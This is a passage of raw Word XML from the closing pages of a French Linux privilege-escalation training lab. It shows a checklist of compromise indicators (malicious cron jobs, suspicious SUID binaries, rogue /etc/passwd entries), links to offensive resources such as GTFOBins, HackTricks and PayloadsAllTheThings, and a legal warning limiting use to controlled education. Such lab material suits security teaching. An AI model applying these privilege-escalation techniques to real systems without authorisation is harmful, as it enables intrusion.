          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/jailed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les tâches cron malveillantes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les binaires SUID suspects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les entrées frauduleuses dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="ressources-complémentaires"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ressources complémentaires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GTFOBins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://gtfobins.github.io/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HackTricks Linux PrivEsc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://book.hacktricks.xyz/linux-hardening/privilege-escalation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PayloadsAllTheThings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://github.com/swisskyrepo/PayloadsAllTheThings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="avertissement-légal"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avertissement légal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce laboratoire est destiné</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">uniquement à des fins éducatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans un environnement contrôlé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’utilisation de ces techniques sur des systèmes sans autorisation explicite est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">illégale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et passible de poursuites pénales.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créé pour le laboratoire JAIL - Privilege Escalation Linux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2026-02-13T09:29:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-13T09:29:25Z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